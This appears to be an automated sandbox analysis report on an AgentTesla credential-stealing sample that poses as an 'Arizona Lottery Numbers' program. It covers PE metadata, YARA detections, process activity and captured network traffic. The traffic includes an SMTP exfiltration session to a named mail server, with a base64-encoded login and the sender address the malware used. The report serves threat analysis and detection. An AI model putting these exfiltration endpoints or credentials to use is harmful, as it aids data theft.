                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe8b300x4b.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x610.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xe6b840xe6c00False0.685777525731data7.2849303293IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xea0000x6100x800False0.33251953125data3.44617295119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xec0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_VERSION0xea0a00x380data
                                                                        RT_MANIFEST0xea4200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightCopyright Hewlett-Packard 2017
                                                                        Assembly Version1.0.0.0
                                                                        InternalNameu0LV.exe
                                                                        FileVersion1.0.0.0
                                                                        CompanyNameHewlett-Packard
                                                                        LegalTrademarks
                                                                        Comments
                                                                        ProductNameArizona Lottery Numbers
                                                                        ProductVersion1.0.0.0
                                                                        FileDescriptionArizona Lottery Numbers
                                                                        OriginalFilenameu0LV.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        11/27/20-15:23:24.958792TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49718587192.168.2.678.142.210.93

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 27, 2020 15:22:57.029541969 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.131767035 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.131903887 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.200814009 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.303051949 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.303113937 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.303132057 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.303155899 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.303210020 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.303220987 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.304078102 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.304320097 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.345762014 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.349543095 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.452027082 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:22:57.511297941 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.756239891 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:22:57.901874065 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:23:05.745234013 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:23:05.848155022 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:23:05.848197937 CET4434971723.21.42.25192.168.2.6
                                                                        Nov 27, 2020 15:23:05.848253012 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:23:05.848321915 CET49717443192.168.2.623.21.42.25
                                                                        Nov 27, 2020 15:23:14.068008900 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:14.161113977 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:14.161282063 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.354101896 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.354325056 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.447261095 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.448476076 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.542258024 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.542555094 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.658055067 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.658705950 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.751693010 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.752012968 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.864866972 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.865117073 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.957688093 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.957963943 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:24.958791971 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.959012985 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.959558010 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:24.959641933 CET49718587192.168.2.678.142.210.93
                                                                        Nov 27, 2020 15:23:25.051637888 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:25.052388906 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:25.095014095 CET5874971878.142.210.93192.168.2.6
                                                                        Nov 27, 2020 15:23:25.146408081 CET49718587192.168.2.678.142.210.93

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 27, 2020 15:21:10.733506918 CET6426753192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:10.769074917 CET53642678.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:21:11.697088003 CET4944853192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:11.724452019 CET53494488.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:21:12.551386118 CET6034253192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:12.579778910 CET53603428.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:21:13.526365042 CET6134653192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:13.553769112 CET53613468.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:21:14.641419888 CET5177453192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:14.668838024 CET53517748.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:21:15.648099899 CET5602353192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:15.675266027 CET53560238.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:21:16.459136963 CET5838453192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:21:16.486483097 CET53583848.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:22:00.580624104 CET6026153192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:22:00.607983112 CET53602618.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:22:00.697251081 CET5606153192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:22:00.724375010 CET53560618.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:22:43.312519073 CET5833653192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:22:43.360272884 CET53583368.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:22:56.612416983 CET5378153192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:22:56.639441967 CET53537818.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:22:56.885485888 CET5406453192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:22:56.912430048 CET53540648.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:23:13.519532919 CET5281153192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:23:13.632555008 CET53528118.8.8.8192.168.2.6
                                                                        Nov 27, 2020 15:23:13.951560020 CET5529953192.168.2.68.8.8.8
                                                                        Nov 27, 2020 15:23:14.066370010 CET53552998.8.8.8192.168.2.6

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Nov 27, 2020 15:22:56.612416983 CET192.168.2.68.8.8.80x3f9aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.885485888 CET192.168.2.68.8.8.80x78edStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:23:13.519532919 CET192.168.2.68.8.8.80x2108Standard query (0)mail.cglgumrukleme.comA (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:23:13.951560020 CET192.168.2.68.8.8.80x529bStandard query (0)mail.cglgumrukleme.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.42.25A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.66.103A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.639441967 CET8.8.8.8192.168.2.60x3f9aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.164.148A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.28A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.161.145A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.66.103A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:22:56.912430048 CET8.8.8.8192.168.2.60x78edNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.204.14.42A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:23:13.632555008 CET8.8.8.8192.168.2.60x2108No error (0)mail.cglgumrukleme.comcglgumrukleme.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 27, 2020 15:23:13.632555008 CET8.8.8.8192.168.2.60x2108No error (0)cglgumrukleme.com78.142.210.93A (IP address)IN (0x0001)
                                                                        Nov 27, 2020 15:23:14.066370010 CET8.8.8.8192.168.2.60x529bNo error (0)mail.cglgumrukleme.comcglgumrukleme.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 27, 2020 15:23:14.066370010 CET8.8.8.8192.168.2.60x529bNo error (0)cglgumrukleme.com78.142.210.93A (IP address)IN (0x0001)

                                                                        HTTPS Packets

                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                        Nov 27, 2020 15:22:57.304320097 CET23.21.42.25443192.168.2.649717CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                        CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029
                                                                        CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        Nov 27, 2020 15:23:24.354101896 CET5874971878.142.210.93192.168.2.6220-rona.veridyen.com ESMTP Exim 4.93 #2 Fri, 27 Nov 2020 17:23:24 +0300
                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                        220 and/or bulk e-mail.
                                                                        Nov 27, 2020 15:23:24.354325056 CET49718587192.168.2.678.142.210.93EHLO 841618
                                                                        Nov 27, 2020 15:23:24.447261095 CET5874971878.142.210.93192.168.2.6250-rona.veridyen.com Hello 841618 [84.17.52.25]
                                                                        250-SIZE 52428800
                                                                        250-8BITMIME
                                                                        250-PIPELINING
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-STARTTLS
                                                                        250 HELP
                                                                        Nov 27, 2020 15:23:24.448476076 CET49718587192.168.2.678.142.210.93AUTH login b3prYW5nZW5jQGNnbGd1bXJ1a2xlbWUuY29t
                                                                        Nov 27, 2020 15:23:24.542258024 CET5874971878.142.210.93192.168.2.6334 UGFzc3dvcmQ6
                                                                        Nov 27, 2020 15:23:24.658055067 CET5874971878.142.210.93192.168.2.6235 Authentication succeeded
                                                                        Nov 27, 2020 15:23:24.658705950 CET49718587192.168.2.678.142.210.93MAIL FROM:<ozkangenc@cglgumrukleme.com>
                                                                        Nov 27, 2020 15:23:24.751693010 CET5874971878.142.210.93192.168.2.6250 OK
                                                                        Nov 27, 2020 15:23:24.752012968 CET49718587192.168.2.678.142.210.93RCPT TO:<ozkangenc@cglgumrukleme.com>
                                                                        Nov 27, 2020 15:23:24.864866972 CET5874971878.142.210.93192.168.2.6250 Accepted
                                                                        Nov 27, 2020 15:23:24.865117073 CET49718587192.168.2.678.142.210.93DATA
                                                                        Nov 27, 2020 15:23:24.957963943 CET5874971878.142.210.93192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                        Nov 27, 2020 15:23:24.959641933 CET49718587192.168.2.678.142.210.93.
                                                                        Nov 27, 2020 15:23:25.095014095 CET5874971878.142.210.93192.168.2.6250 OK id=1kieei-0001HA-To

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:15:21:15
                                                                        Start date:27/11/2020
                                                                        Path:C:\Users\user\Desktop\swift copy.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\swift copy.exe'
                                                                        Imagebase:0x870000
                                                                        File size:948224 bytes
                                                                        MD5 hash:D1173F90F82DE7D1730939BD45027F6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.352520521.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:15:21:23
                                                                        Start date:27/11/2020
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Imagebase:0x960000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.602855902.0000000002FF8000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.602533410.0000000002FAF000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:15:21:55
                                                                        Start date:27/11/2020
                                                                        Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                                                        Imagebase:0xdf0000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Antivirus matches:
                                                                        • Detection: 0%, Metadefender, Browse
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:15:21:56
                                                                        Start date:27/11/2020
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff61de10000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:15:22:04
                                                                        Start date:27/11/2020
                                                                        Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
                                                                        Imagebase:0x5f0000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:15:22:04
                                                                        Start date:27/11/2020
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff61de10000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >